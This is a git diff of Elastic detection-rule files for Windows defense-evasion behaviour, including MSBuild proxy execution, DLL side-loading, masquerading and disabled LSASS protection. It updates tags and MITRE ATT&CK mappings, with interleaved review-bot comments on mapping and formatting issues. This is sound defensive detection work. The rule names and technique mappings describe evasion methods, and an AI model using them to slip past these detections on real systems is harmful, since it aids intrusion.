@@ -2,7 +2,7 @@ creation_date = "2020/03/25" integration = ["endpoint", "windows", "system", "m365_defender", "sentinel_one_cloud_funnel", "crowdstrike"] maturity = "production" -updated_date = "2026/03/23" +updated_date = "2025/03/20" [rule] author = ["Elastic"] @@ -85,7 +85,21 @@ references = ["https://blog.talosintelligence.com/2020/02/building-bypass-with-m risk_score = 73 rule_id = "c5dc3223-13a2-44a2-946c-e9dc0aa0449c" severity = "high" -tags = ["Domain: Endpoint", "OS: Windows", "Use Case: Threat Detection", "Tactic: Defense Evasion", "Resources: Investigation Guide", "Data Source: Elastic Endgame", "Data Source: Elastic Defend", "Data Source: Windows Security Event Logs", "Data Source: Microsoft Defender for Endpoint", "Data Source: Sysmon", "Data Source: SentinelOne", "Data Source: Crowdstrike"] +tags = [ + "Domain: Endpoint", + "OS: Windows", + "Use Case: Threat Detection", + "Tactic: Defense Evasion", + "Tactic: Execution", + "Resources: Investigation Guide", + "Data Source: Elastic Endgame", + "Data Source: Elastic Defend", + "Data Source: Windows Security Event Logs", + "Data Source: Microsoft Defender for Endpoint", + "Data Source: Sysmon", + "Data Source: SentinelOne", + "Data Source: Crowdstrike", +] timestamp_override = "event.ingested" type = "eql" @@ -105,18 +119,26 @@ process where host.os.type == "windows" and event.type == "start" and [[rule.threat]] framework = "MITRE ATT&CK" - [[rule.threat.technique]] id = "T1127" name = "Trusted Developer Utilities Proxy Execution" reference = "https://attack.mitre.org/techniques/T1127/" - [[rule.threat.technique.subtechnique]] id = "T1127.001" name = "MSBuild" reference = "https://attack.mitre.org/techniques/T1127/001/" + + [rule.threat.tactic] id = "TA0005" name = "Defense Evasion" reference = "https://attack.mitre.org/tactics/TA0005/" +[[rule.threat]] +framework = "MITRE ATT&CK" + +[rule.threat.tactic] +id = "TA0002" +name = "Execution" +reference = "https://attack.mitre.org/tactics/TA0002/" + 
diff --git a/rules/windows/defense_evasion_execution_msbuild_started_by_script.toml b/rules/windows/defense_evasion_execution_msbuild_started_by_script.toml index 34687a32d2b..078583b84ea 100755 --- a/rules/windows/defense_evasion_execution_msbuild_started_by_script.toml +++ b/rules/windows/defense_evasion_execution_msbuild_started_by_script.toml @@ -2,7 +2,7 @@ creation_date = "2020/03/25" integration = ["endpoint", "windows"] maturity = "production" -updated_date = "2026/03/23" +updated_date = "2026/01/15" [rule] author = ["Elastic"] @@ -54,7 +54,16 @@ The Microsoft Build Engine (MSBuild) is a platform for building applications, ty risk_score = 47 rule_id = "9d110cb3-5f4b-4c9a-b9f5-53f0a1707ae2" severity = "medium" -tags = ["Domain: Endpoint", "OS: Windows", "Use Case: Threat Detection", "Tactic: Defense Evasion", "Data Source: Elastic Defend", "Data Source: Sysmon", "Resources: Investigation Guide"] +tags = [ + "Domain: Endpoint", + "OS: Windows", + "Use Case: Threat Detection", + "Tactic: Defense Evasion", + "Tactic: Execution", + "Data Source: Elastic Defend", + "Data Source: Sysmon", + "Resources: Investigation Guide", +] timestamp_override = "event.ingested" type = "new_terms" 
@@ -78,21 +87,49 @@ host.os.type:windows and event.category:process and event.type:start and ( [[rule.threat]] framework = "MITRE ATT&CK" - [[rule.threat.technique]] id = "T1127" name = "Trusted Developer Utilities Proxy Execution" reference = "https://attack.mitre.org/techniques/T1127/" - [[rule.threat.technique.subtechnique]] id = "T1127.001" name = "MSBuild" reference = "https://attack.mitre.org/techniques/T1127/001/" + + [rule.threat.tactic] id = "TA0005" name = "Defense Evasion" reference = "https://attack.mitre.org/tactics/TA0005/" +[[rule.threat]] +framework = "MITRE ATT&CK" +[[rule.threat.technique]] +id = "T1059" +name = "Command and Scripting Interpreter" +reference = "https://attack.mitre.org/techniques/T1059/" +[[rule.threat.technique.subtechnique]] +id = "T1059.001" +name = "PowerShell" +reference = "https://attack.mitre.org/techniques/T1059/001/" + +[[rule.threat.technique.subtechnique]] +id = "T1059.003" +name = "Windows Command Shell" +reference = "https://attack.mitre.org/techniques/T1059/003/" + +[[rule.threat.technique.subtechnique]] +id = "T1059.005" +name = "Visual Basic" +reference = "https://attack.mitre.org/techniques/T1059/005/" + + + +[rule.threat.tactic] +id = "TA0002" +name = "Execution" +reference = "https://attack.mitre.org/tactics/TA0002/" + [rule.new_terms] field = "new_terms_fields" value = ["host.id"] diff --git a/rules/windows/defense_evasion_execution_msbuild_started_by_system_process.toml b/rules/windows/defense_evasion_execution_msbuild_started_by_system_process.toml index 6992af6d0a0..c2e91fd6574 100644 --- a/rules/windows/defense_evasion_execution_msbuild_started_by_system_process.toml +++ b/rules/windows/defense_evasion_execution_msbuild_started_by_system_process.toml 
@@ -2,7 +2,7 @@ creation_date = "2020/03/25" integration = ["endpoint", "windows", "system", "m365_defender", "sentinel_one_cloud_funnel", "crowdstrike"] maturity = "production" -updated_date = "2026/03/23" +updated_date = "2025/03/20" [rule] author = ["Elastic"] @@ -64,7 +64,21 @@ The Microsoft Build Engine (MSBuild) is a platform for building applications, ty risk_score = 47 rule_id = "9d110cb3-5f4b-4c9a-b9f5-53f0a1707ae3" severity = "medium" -tags = ["Domain: Endpoint", "OS: Windows", "Use Case: Threat Detection", "Tactic: Defense Evasion", "Data Source: Elastic Endgame", "Data Source: Elastic Defend", "Data Source: Windows Security Event Logs", "Data Source: Microsoft Defender for Endpoint", "Data Source: Sysmon", "Data Source: SentinelOne", "Data Source: Crowdstrike", "Resources: Investigation Guide"] +tags = [ + "Domain: Endpoint", + "OS: Windows", + "Use Case: Threat Detection", + "Tactic: Defense Evasion", + "Tactic: Execution", + "Data Source: Elastic Endgame", + "Data Source: Elastic Defend", + "Data Source: Windows Security Event Logs", + "Data Source: Microsoft Defender for Endpoint", + "Data Source: Sysmon", + "Data Source: SentinelOne", + "Data Source: Crowdstrike", + "Resources: Investigation Guide", +] timestamp_override = "event.ingested" type = "eql" @@ -77,18 +91,26 @@ process where host.os.type == "windows" and event.type == "start" and [[rule.threat]] framework = "MITRE ATT&CK" - [[rule.threat.technique]] id = "T1127" name = "Trusted Developer Utilities Proxy Execution" reference = "https://attack.mitre.org/techniques/T1127/" - [[rule.threat.technique.subtechnique]] id = "T1127.001" name = "MSBuild" reference = "https://attack.mitre.org/techniques/T1127/001/" + + [rule.threat.tactic] id = "TA0005" name = "Defense Evasion" reference = "https://attack.mitre.org/tactics/TA0005/" +[[rule.threat]] +framework = "MITRE ATT&CK" + +[rule.threat.tactic] +id = "TA0002" +name = "Execution" +reference = "https://attack.mitre.org/tactics/TA0002/" + 
diff --git a/rules/windows/defense_evasion_execution_msbuild_started_renamed.toml b/rules/windows/defense_evasion_execution_msbuild_started_renamed.toml index 75f254895c1..084e10613d6 100644 --- a/rules/windows/defense_evasion_execution_msbuild_started_renamed.toml +++ b/rules/windows/defense_evasion_execution_msbuild_started_renamed.toml @@ -2,7 +2,7 @@ creation_date = "2020/03/25" integration = ["endpoint", "windows", "m365_defender", "crowdstrike"] maturity = "production" -updated_date = "2026/03/23" +updated_date = "2025/08/26" [transform] [[transform.osquery]] @@ -102,7 +102,19 @@ This rule checks for renamed instances of MSBuild, which can indicate an attempt risk_score = 21 rule_id = "9d110cb3-5f4b-4c9a-b9f5-53f0a1707ae4" severity = "low" -tags = ["Domain: Endpoint", "OS: Windows", "Use Case: Threat Detection", "Tactic: Defense Evasion", "Data Source: Elastic Endgame", "Resources: Investigation Guide", "Data Source: Elastic Defend", "Data Source: Sysmon", "Data Source: Microsoft Defender for Endpoint", "Data Source: Crowdstrike"] +tags = [ + "Domain: Endpoint", + "OS: Windows", + "Use Case: Threat Detection", + "Tactic: Defense Evasion", + "Tactic: Execution", + "Data Source: Elastic Endgame", + "Resources: Investigation Guide", + "Data Source: Elastic Defend", + "Data Source: Sysmon", + "Data Source: Microsoft Defender for Endpoint", + "Data Source: Crowdstrike", +] timestamp_override = "event.ingested" type = "eql" 
@@ -115,28 +127,29 @@ process where host.os.type == "windows" and event.type == "start" and [[rule.threat]] framework = "MITRE ATT&CK" - [[rule.threat.technique]] id = "T1036" name = "Masquerading" reference = "https://attack.mitre.org/techniques/T1036/" - [[rule.threat.technique.subtechnique]] id = "T1036.003" name = "Rename Legitimate Utilities" reference = "https://attack.mitre.org/techniques/T1036/003/" + [[rule.threat.technique]] id = "T1127" name = "Trusted Developer Utilities Proxy Execution" reference = "https://attack.mitre.org/techniques/T1127/" - [[rule.threat.technique.subtechnique]] id = "T1127.001" name = "MSBuild" reference = "https://attack.mitre.org/techniques/T1127/001/" + + [rule.threat.tactic] id = "TA0005" name = "Defense Evasion" reference = "https://attack.mitre.org/tactics/TA0005/" + diff --git a/rules/windows/defense_evasion_execution_msbuild_started_unusal_process.toml b/rules/windows/defense_evasion_execution_msbuild_started_unusal_process.toml index 2f5cda9c602..ba363f8f52b 100644 --- a/rules/windows/defense_evasion_execution_msbuild_started_unusal_process.toml +++ b/rules/windows/defense_evasion_execution_msbuild_started_unusal_process.toml @@ -2,7 +2,7 @@ creation_date = "2020/03/25" integration = ["endpoint", "windows", "system"] maturity = "production" -updated_date = "2026/03/23" +updated_date = "2026/01/15" [rule] author = ["Elastic"] 
@@ -66,7 +66,17 @@ references = ["https://blog.talosintelligence.com/2020/02/building-bypass-with-m risk_score = 21 rule_id = "9d110cb3-5f4b-4c9a-b9f5-53f0a1707ae6" severity = "low" -tags = ["Domain: Endpoint", "OS: Windows", "Use Case: Threat Detection", "Tactic: Defense Evasion", "Data Source: Elastic Defend", "Data Source: Sysmon", "Data Source: Windows Security Event Logs", "Resources: Investigation Guide"] +tags = [ + "Domain: Endpoint", + "OS: Windows", + "Use Case: Threat Detection", + "Tactic: Defense Evasion", + "Tactic: Execution", + "Data Source: Elastic Defend", + "Data Source: Sysmon", + "Data Source: Windows Security Event Logs", + "Resources: Investigation Guide", +] timestamp_override = "event.ingested" type = "new_terms" @@ -78,31 +88,32 @@ process.name:("csc.exe" or "iexplore.exe" or "powershell.exe") [[rule.threat]] framework = "MITRE ATT&CK" - [[rule.threat.technique]] id = "T1027" name = "Obfuscated Files or Information" reference = "https://attack.mitre.org/techniques/T1027/" - [[rule.threat.technique.subtechnique]] id = "T1027.004" name = "Compile After Delivery" reference = "https://attack.mitre.org/techniques/T1027/004/" + [[rule.threat.technique]] id = "T1127" name = "Trusted Developer Utilities Proxy Execution" reference = "https://attack.mitre.org/techniques/T1127/" - [[rule.threat.technique.subtechnique]] id = "T1127.001" name = "MSBuild" reference = "https://attack.mitre.org/techniques/T1127/001/" + + [rule.threat.tactic] id = "TA0005" name = "Defense Evasion" reference = "https://attack.mitre.org/tactics/TA0005/" + [rule.new_terms] field = "new_terms_fields" value = ["host.id"] diff --git a/rules/windows/defense_evasion_execution_suspicious_explorer_winword.toml b/rules/windows/defense_evasion_execution_suspicious_explorer_winword.toml index d817fd8d7cf..4b5e879dc86 100644 --- a/rules/windows/defense_evasion_execution_suspicious_explorer_winword.toml +++ b/rules/windows/defense_evasion_execution_suspicious_explorer_winword.toml 
@@ -2,7 +2,7 @@ creation_date = "2020/09/03" integration = ["endpoint", "windows", "m365_defender", "crowdstrike", "sentinel_one_cloud_funnel"] maturity = "production" -updated_date = "2026/03/23" +updated_date = "2025/09/11" [rule] author = ["Elastic"] @@ -62,7 +62,20 @@ DLL side-loading exploits the DLL search order to load malicious code into trust risk_score = 47 rule_id = "1160dcdb-0a0a-4a79-91d8-9b84616edebd" severity = "medium" -tags = ["Domain: Endpoint", "OS: Windows", "Use Case: Threat Detection", "Tactic: Defense Evasion", "Data Source: Elastic Endgame", "Data Source: Elastic Defend", "Data Source: Sysmon", "Data Source: Microsoft Defender for Endpoint", "Resources: Investigation Guide", "Data Source: Crowdstrike", "Data Source: SentinelOne"] +tags = [ + "Domain: Endpoint", + "OS: Windows", + "Use Case: Threat Detection", + "Tactic: Defense Evasion", + "Tactic: Execution", + "Data Source: Elastic Endgame", + "Data Source: Elastic Defend", + "Data Source: Sysmon", + "Data Source: Microsoft Defender for Endpoint", + "Resources: Investigation Guide", + "Data Source: Crowdstrike", + "Data Source: SentinelOne", +] timestamp_override = "event.ingested" type = "eql" @@ -110,18 +123,24 @@ process where host.os.type == "windows" and event.type == "start" and [[rule.threat]] framework = "MITRE ATT&CK" +[[rule.threat.technique]] +id = "T1036" +name = "Masquerading" +reference = "https://attack.mitre.org/techniques/T1036/" [[rule.threat.technique]] id = "T1574" name = "Hijack Execution Flow" reference = "https://attack.mitre.org/techniques/T1574/" - [[rule.threat.technique.subtechnique]] id = "T1574.001" name = "DLL" reference = "https://attack.mitre.org/techniques/T1574/001/" + + [rule.threat.tactic] id = "TA0005" name = "Defense Evasion" reference = "https://attack.mitre.org/tactics/TA0005/" + 
diff --git a/rules/windows/defense_evasion_execution_windefend_unusual_path.toml b/rules/windows/defense_evasion_execution_windefend_unusual_path.toml
index 98338405475..e1eaae3f8de 100644
--- a/rules/windows/defense_evasion_execution_windefend_unusual_path.toml
+++ b/rules/windows/defense_evasion_execution_windefend_unusual_path.toml
@@ -2,7 +2,7 @@
 creation_date = "2021/07/07"
 integration = ["endpoint", "windows", "m365_defender", "crowdstrike"]
 maturity = "production"
-updated_date = "2026/03/23"
+updated_date = "2025/09/11"
 
 [rule]
 author = ["Elastic", "Dennis Perto"]
@@ -63,7 +63,19 @@ references = [
 risk_score = 73
 rule_id = "053a0387-f3b5-4ba5-8245-8002cca2bd08"
 severity = "high"
-tags = ["Domain: Endpoint", "OS: Windows", "Use Case: Threat Detection", "Tactic: Defense Evasion", "Data Source: Elastic Endgame", "Data Source: Elastic Defend", "Data Source: Sysmon", "Data Source: Microsoft Defender for Endpoint", "Data Source: Crowdstrike", "Resources: Investigation Guide"]
+tags = [
+ "Domain: Endpoint",
+ "OS: Windows",
+ "Use Case: Threat Detection",
+ "Tactic: Defense Evasion",
+ "Data Source: Elastic Endgame",
+ "Tactic: Execution",
+ "Data Source: Elastic Defend",
+ "Data Source: Sysmon",
+ "Data Source: Microsoft Defender for Endpoint",
+ "Data Source: Crowdstrike",
+ "Resources: Investigation Guide",
+]
 timestamp_override = "event.ingested"
 type = "eql"
 
@@ -94,23 +106,19 @@ process where host.os.type == "windows" and event.type == "start" and [[rule.threat]] framework = "MITRE ATT&CK" - [[rule.threat.technique]] -id = "T1036" -name = "Masquerading" -reference = "https://attack.mitre.org/techniques/T1036/" - +id = "T1574" +name = "Hijack Execution Flow" +reference = "https://attack.mitre.org/techniques/T1574/" [[rule.threat.technique.subtechnique]] -id = "T1036.003" -name = "Rename Legitimate Utilities" -reference = "https://attack.mitre.org/techniques/T1036/003/" +id = "T1574.001" +name = "DLL" +reference = "https://attack.mitre.org/techniques/T1574/001/" + -[[rule.threat.technique.subtechnique]] -id = "T1036.005" -name = "Match Legitimate Resource Name or Location" -reference = "https://attack.mitre.org/techniques/T1036/005/" [rule.threat.tactic] id = "TA0005" name = "Defense Evasion" reference = "https://attack.mitre.org/tactics/TA0005/" + diff --git a/rules/windows/defense_evasion_file_creation_mult_extension.toml b/rules/windows/defense_evasion_file_creation_mult_extension.toml index d0b71e826a1..8725775f18e 100644 --- a/rules/windows/defense_evasion_file_creation_mult_extension.toml +++ b/rules/windows/defense_evasion_file_creation_mult_extension.toml @@ -2,7 +2,7 @@ creation_date = "2021/01/19" integration = ["endpoint", "windows", "m365_defender", "sentinel_one_cloud_funnel", "crowdstrike"] maturity = "production" -updated_date = "2026/03/23" +updated_date = "2025/08/26" [rule] author = ["Elastic"] 
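Review bot: The new mapping for defense_evasion_execution_windefend_unusual_path replaces T1036 Masquerading (with T1036.003 and T1036.005) by T1574.001 DLL hijacking, and nothing in the hunk motivates the change; the rule's query lies outside it. A Defender binary started from an unexpected location is what the removed T1036.005 `Match Legitimate Resource Name or Location` describes, and T1574.001 is the mapping the DLL side-loading rule (defense_evasion_execution_suspicious_explorer_winword) keeps in this same patch, so the two mappings look as if they may have been crossed. Please confirm the swap is intentional; if not, the fix is to restore the removed T1036 block verbatim in place of the added T1574 lines.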
@@ -98,18 +98,36 @@ file where host.os.type == "windows" and event.type == "creation" and file.exten [[rule.threat]] framework = "MITRE ATT&CK" - [[rule.threat.technique]] id = "T1036" name = "Masquerading" reference = "https://attack.mitre.org/techniques/T1036/" - [[rule.threat.technique.subtechnique]] id = "T1036.007" name = "Double File Extension" reference = "https://attack.mitre.org/techniques/T1036/007/" + + [rule.threat.tactic] id = "TA0005" name = "Defense Evasion" reference = "https://attack.mitre.org/tactics/TA0005/" +[[rule.threat]] +framework = "MITRE ATT&CK" +[[rule.threat.technique]] +id = "T1204" +name = "User Execution" +reference = "https://attack.mitre.org/techniques/T1204/" +[[rule.threat.technique.subtechnique]] +id = "T1204.002" +name = "Malicious File" +reference = "https://attack.mitre.org/techniques/T1204/002/" + + + +[rule.threat.tactic] +id = "TA0002" +name = "Execution" +reference = "https://attack.mitre.org/tactics/TA0002/" + diff --git a/rules/windows/defense_evasion_hide_encoded_executable_registry.toml b/rules/windows/defense_evasion_hide_encoded_executable_registry.toml index b546108d92b..628a39d0949 100644 --- a/rules/windows/defense_evasion_hide_encoded_executable_registry.toml +++ b/rules/windows/defense_evasion_hide_encoded_executable_registry.toml @@ -2,7 +2,7 @@ creation_date = "2020/11/25" integration = ["endpoint", "windows", "sentinel_one_cloud_funnel", "m365_defender", "crowdstrike"] maturity = "production" -updated_date = "2026/03/23" +updated_date = "2026/02/19" [rule] author = ["Elastic"] 
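Review bot: A second `[[rule.threat]]` block for TA0002 Execution (T1204.002) is added to defense_evasion_file_creation_mult_extension, but the patch carries no tags hunk for this file, so unless its existing tags already contain `Tactic: Execution` the new tactic is mapped without a tag; the tags line is outside this hunk, please confirm. The same applies to defense_evasion_masquerading_communication_apps (Persistence/TA0003 added, no tags hunk) and defense_evasion_ms_office_suspicious_regmod (Execution/TA0002 added, no tags hunk). Style: the three consecutive added blank lines before the new `[rule.threat.tactic]` here (and in ms_office_suspicious_regmod) could be reduced to one to match the single blank line used above the first tactic table.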
@@ -85,18 +85,19 @@ registry where host.os.type == "windows" and [[rule.threat]] framework = "MITRE ATT&CK" - -[[rule.threat.technique]] -id = "T1027" -name = "Obfuscated Files or Information" -reference = "https://attack.mitre.org/techniques/T1027/" - [[rule.threat.technique]] id = "T1112" name = "Modify Registry" reference = "https://attack.mitre.org/techniques/T1112/" +[[rule.threat.technique]] +id = "T1140" +name = "Deobfuscate/Decode Files or Information" +reference = "https://attack.mitre.org/techniques/T1140/" + + [rule.threat.tactic] id = "TA0005" name = "Defense Evasion" reference = "https://attack.mitre.org/tactics/TA0005/" + diff --git a/rules/windows/defense_evasion_iis_httplogging_disabled.toml b/rules/windows/defense_evasion_iis_httplogging_disabled.toml index 9a117a755ba..1f7de5422de 100644 --- a/rules/windows/defense_evasion_iis_httplogging_disabled.toml +++ b/rules/windows/defense_evasion_iis_httplogging_disabled.toml @@ -2,7 +2,7 @@ creation_date = "2020/04/14" integration = ["endpoint", "windows", "system", "m365_defender", "sentinel_one_cloud_funnel", "crowdstrike"] maturity = "production" -updated_date = "2026/03/23" +updated_date = "2025/09/11" [rule] author = ["Elastic"] @@ -89,13 +89,19 @@ process where host.os.type == "windows" and event.type == "start" and [[rule.threat]] framework = "MITRE ATT&CK" - [[rule.threat.technique]] id = "T1562" name = "Impair Defenses" reference = "https://attack.mitre.org/techniques/T1562/" +[[rule.threat.technique.subtechnique]] +id = "T1562.002" +name = "Disable Windows Event Logging" +reference = "https://attack.mitre.org/techniques/T1562/002/" + + [rule.threat.tactic] id = "TA0005" name = "Defense Evasion" reference = "https://attack.mitre.org/tactics/TA0005/" + diff --git a/rules/windows/defense_evasion_indirect_exec_conhost.toml b/rules/windows/defense_evasion_indirect_exec_conhost.toml index 9b8ba6a9f67..12330d28d1f 100644 --- a/rules/windows/defense_evasion_indirect_exec_conhost.toml 
+++ b/rules/windows/defense_evasion_indirect_exec_conhost.toml @@ -2,7 +2,7 @@ creation_date = "2025/08/21" integration = ["endpoint", "windows", "system", "m365_defender", "sentinel_one_cloud_funnel", "crowdstrike"] maturity = "production" -updated_date = "2026/03/23" +updated_date = "2025/08/21" [rule] author = ["Elastic"] @@ -80,13 +80,14 @@ process where host.os.type == "windows" and event.type == "start" and [[rule.threat]] framework = "MITRE ATT&CK" - [[rule.threat.technique]] -id = "T1218" -name = "System Binary Proxy Execution" -reference = "https://attack.mitre.org/techniques/T1218/" +id = "T1202" +name = "Indirect Command Execution" +reference = "https://attack.mitre.org/techniques/T1202/" + [rule.threat.tactic] id = "TA0005" name = "Defense Evasion" reference = "https://attack.mitre.org/tactics/TA0005/" + diff --git a/rules/windows/defense_evasion_injection_msbuild.toml b/rules/windows/defense_evasion_injection_msbuild.toml index 593490f1528..742f00543cf 100755 --- a/rules/windows/defense_evasion_injection_msbuild.toml +++ b/rules/windows/defense_evasion_injection_msbuild.toml @@ -2,7 +2,7 @@ creation_date = "2020/03/25" integration = ["windows"] maturity = "production" -updated_date = "2026/03/23" +updated_date = "2025/03/20" [rule] author = ["Elastic"] 
@@ -76,26 +76,36 @@ process where host.os.type == "windows" and [[rule.threat]] framework = "MITRE ATT&CK" - [[rule.threat.technique]] id = "T1055" name = "Process Injection" reference = "https://attack.mitre.org/techniques/T1055/" +[[rule.threat.technique]] +id = "T1127" +name = "Trusted Developer Utilities Proxy Execution" +reference = "https://attack.mitre.org/techniques/T1127/" +[[rule.threat.technique.subtechnique]] +id = "T1127.001" +name = "MSBuild" +reference = "https://attack.mitre.org/techniques/T1127/001/" + + + [rule.threat.tactic] id = "TA0005" name = "Defense Evasion" reference = "https://attack.mitre.org/tactics/TA0005/" - [[rule.threat]] framework = "MITRE ATT&CK" - [[rule.threat.technique]] id = "T1055" name = "Process Injection" reference = "https://attack.mitre.org/techniques/T1055/" + [rule.threat.tactic] id = "TA0004" name = "Privilege Escalation" reference = "https://attack.mitre.org/tactics/TA0004/" + diff --git a/rules/windows/defense_evasion_lolbas_win_cdb_utility.toml b/rules/windows/defense_evasion_lolbas_win_cdb_utility.toml index f7f2e8233a2..bc19ee7efbd 100644 --- a/rules/windows/defense_evasion_lolbas_win_cdb_utility.toml +++ b/rules/windows/defense_evasion_lolbas_win_cdb_utility.toml @@ -2,7 +2,7 @@ creation_date = "2024/07/24" integration = ["endpoint", "windows", "system", "sentinel_one_cloud_funnel", "m365_defender", "crowdstrike"] maturity = "production" -updated_date = "2026/03/23" +updated_date = "2025/08/28" [rule] author = ["Elastic"] 
@@ -95,13 +95,14 @@ process where host.os.type == "windows" and event.type == "start" and [[rule.threat]] framework = "MITRE ATT&CK" - [[rule.threat.technique]] -id = "T1127" -name = "Trusted Developer Utilities Proxy Execution" -reference = "https://attack.mitre.org/techniques/T1127/" +id = "T1218" +name = "System Binary Proxy Execution" +reference = "https://attack.mitre.org/techniques/T1218/" + [rule.threat.tactic] id = "TA0005" name = "Defense Evasion" reference = "https://attack.mitre.org/tactics/TA0005/" + diff --git a/rules/windows/defense_evasion_lsass_ppl_disabled_registry.toml b/rules/windows/defense_evasion_lsass_ppl_disabled_registry.toml index 0801bc6399a..6f434c174de 100644 --- a/rules/windows/defense_evasion_lsass_ppl_disabled_registry.toml +++ b/rules/windows/defense_evasion_lsass_ppl_disabled_registry.toml @@ -2,7 +2,7 @@ creation_date = "2025/05/27" integration = ["endpoint", "windows", "m365_defender", "sentinel_one_cloud_funnel", "crowdstrike"] maturity = "production" -updated_date = "2026/03/23" +updated_date = "2026/02/23" [rule] author = ["Elastic"] @@ -92,7 +92,6 @@ registry where host.os.type == "windows" and event.type == "change" and [[rule.threat]] framework = "MITRE ATT&CK" - [[rule.threat.technique]] id = "T1112" name = "Modify Registry" @@ -102,6 +101,12 @@ reference = "https://attack.mitre.org/techniques/T1112/" id = "T1562" name = "Impair Defenses" reference = "https://attack.mitre.org/techniques/T1562/" +[[rule.threat.technique.subtechnique]] +id = "T1562.001" +name = "Disable or Modify Tools" +reference = "https://attack.mitre.org/techniques/T1562/001/" + + [rule.threat.tactic] id = "TA0005" diff --git a/rules/windows/defense_evasion_masquerading_as_elastic_endpoint_process.toml b/rules/windows/defense_evasion_masquerading_as_elastic_endpoint_process.toml index bd9fa5b3fc7..47bf071a3c6 100644 --- a/rules/windows/defense_evasion_masquerading_as_elastic_endpoint_process.toml 
+++ b/rules/windows/defense_evasion_masquerading_as_elastic_endpoint_process.toml @@ -2,7 +2,7 @@ creation_date = "2020/08/24" integration = ["endpoint", "windows", "system", "m365_defender", "sentinel_one_cloud_funnel"] maturity = "production" -updated_date = "2026/03/23" +updated_date = "2025/07/02" [rule] author = ["Elastic"] @@ -111,18 +111,19 @@ process where host.os.type == "windows" and event.type == "start" and [[rule.threat]] framework = "MITRE ATT&CK" - [[rule.threat.technique]] -id = "T1055" -name = "Process Injection" -reference = "https://attack.mitre.org/techniques/T1055/" - +id = "T1036" +name = "Masquerading" +reference = "https://attack.mitre.org/techniques/T1036/" [[rule.threat.technique.subtechnique]] -id = "T1055.012" -name = "Process Hollowing" -reference = "https://attack.mitre.org/techniques/T1055/012/" +id = "T1036.005" +name = "Match Legitimate Resource Name or Location" +reference = "https://attack.mitre.org/techniques/T1036/005/" + + [rule.threat.tactic] id = "TA0005" name = "Defense Evasion" reference = "https://attack.mitre.org/tactics/TA0005/" + diff --git a/rules/windows/defense_evasion_masquerading_business_apps_installer.toml b/rules/windows/defense_evasion_masquerading_business_apps_installer.toml index 0a25a153287..6b6d840dfd7 100644 --- a/rules/windows/defense_evasion_masquerading_business_apps_installer.toml +++ b/rules/windows/defense_evasion_masquerading_business_apps_installer.toml @@ -2,7 +2,7 @@ creation_date = "2023/09/01" integration = ["endpoint"] maturity = "production" -updated_date = "2026/03/23" +updated_date = "2025/12/17" [rule] author = ["Elastic"] 
@@ -22,7 +22,17 @@ references = [
 risk_score = 21
 rule_id = "feafdc51-c575-4ed2-89dd-8e20badc2d6c"
 severity = "low"
-tags = ["Domain: Endpoint", "Tactic: Defense Evasion", "Tactic: Execution", "Data Source: Elastic Defend", "Data Source: Elastic Endgame", "OS: Windows", "Use Case: Threat Detection", "Resources: Investigation Guide"]
+tags = [
+ "Domain: Endpoint",
+ "Data Source: Elastic Defend",
+ "Data Source: Elastic Endgame",
+ "OS: Windows",
+ "Use Case: Threat Detection",
+ "Tactic: Defense Evasion",
+ "Tactic: Initial Access",
+ "Tactic: Execution",
+ "Resources: Investigation Guide"
+]
 timestamp_override = "event.ingested"
 type = "eql"
 
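Review bot: The last element `"Resources: Investigation Guide"` carries no trailing comma, unlike every other expanded `tags` array in this patch, whose final entry is written `"...",` before the closing `]`; write `"Resources: Investigation Guide",` so the arrays are formatted uniformly and a later addition is a one-line diff. The element order also differs from the other files (the `Tactic:` tags follow the `Data Source:` and `OS:` tags here); not a defect, but worth aligning while the array is being rewritten anyway.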
@@ -199,36 +209,53 @@ Business applications are integral to productivity, often downloaded and install [[rule.threat]] framework = "MITRE ATT&CK" - [[rule.threat.technique]] id = "T1036" name = "Masquerading" reference = "https://attack.mitre.org/techniques/T1036/" +[[rule.threat.technique.subtechnique]] +id = "T1036.001" +name = "Invalid Code Signature" +reference = "https://attack.mitre.org/techniques/T1036/001/" [[rule.threat.technique.subtechnique]] id = "T1036.005" name = "Match Legitimate Resource Name or Location" reference = "https://attack.mitre.org/techniques/T1036/005/" + + [rule.threat.tactic] id = "TA0005" name = "Defense Evasion" reference = "https://attack.mitre.org/tactics/TA0005/" - [[rule.threat]] framework = "MITRE ATT&CK" +[[rule.threat.technique]] +id = "T1189" +name = "Drive-by Compromise" +reference = "https://attack.mitre.org/techniques/T1189/" + +[rule.threat.tactic] +id = "TA0001" +name = "Initial Access" +reference = "https://attack.mitre.org/tactics/TA0001/" +[[rule.threat]] +framework = "MITRE ATT&CK" [[rule.threat.technique]] id = "T1204" name = "User Execution" reference = "https://attack.mitre.org/techniques/T1204/" - [[rule.threat.technique.subtechnique]] id = "T1204.002" name = "Malicious File" reference = "https://attack.mitre.org/techniques/T1204/002/" + + [rule.threat.tactic] id = "TA0002" name = "Execution" reference = "https://attack.mitre.org/tactics/TA0002/" + diff --git a/rules/windows/defense_evasion_masquerading_communication_apps.toml b/rules/windows/defense_evasion_masquerading_communication_apps.toml index 49a0ebbad28..e280b7fae10 100644 --- a/rules/windows/defense_evasion_masquerading_communication_apps.toml +++ b/rules/windows/defense_evasion_masquerading_communication_apps.toml @@ -2,7 +2,7 @@ creation_date = "2023/05/05" integration = ["endpoint", "sentinel_one_cloud_funnel"] maturity = "production" -updated_date = "2026/03/23" +updated_date = "2025/12/17" [rule] author = ["Elastic"] 
@@ -138,12 +138,10 @@ Communication apps are integral to modern workflows, facilitating seamless inter [[rule.threat]] framework = "MITRE ATT&CK" - [[rule.threat.technique]] id = "T1036" name = "Masquerading" reference = "https://attack.mitre.org/techniques/T1036/" - [[rule.threat.technique.subtechnique]] id = "T1036.001" name = "Invalid Code Signature" @@ -154,7 +152,22 @@ id = "T1036.005" name = "Match Legitimate Resource Name or Location" reference = "https://attack.mitre.org/techniques/T1036/005/" + + [rule.threat.tactic] id = "TA0005" name = "Defense Evasion" reference = "https://attack.mitre.org/tactics/TA0005/" +[[rule.threat]] +framework = "MITRE ATT&CK" +[[rule.threat.technique]] +id = "T1554" +name = "Compromise Host Software Binary" +reference = "https://attack.mitre.org/techniques/T1554/" + + +[rule.threat.tactic] +id = "TA0003" +name = "Persistence" +reference = "https://attack.mitre.org/tactics/TA0003/" + diff --git a/rules/windows/defense_evasion_masquerading_suspicious_werfault_childproc.toml b/rules/windows/defense_evasion_masquerading_suspicious_werfault_childproc.toml index 3637fb30676..f7808e814e3 100644 --- a/rules/windows/defense_evasion_masquerading_suspicious_werfault_childproc.toml +++ b/rules/windows/defense_evasion_masquerading_suspicious_werfault_childproc.toml @@ -2,7 +2,7 @@ creation_date = "2020/08/24" integration = ["endpoint", "windows", 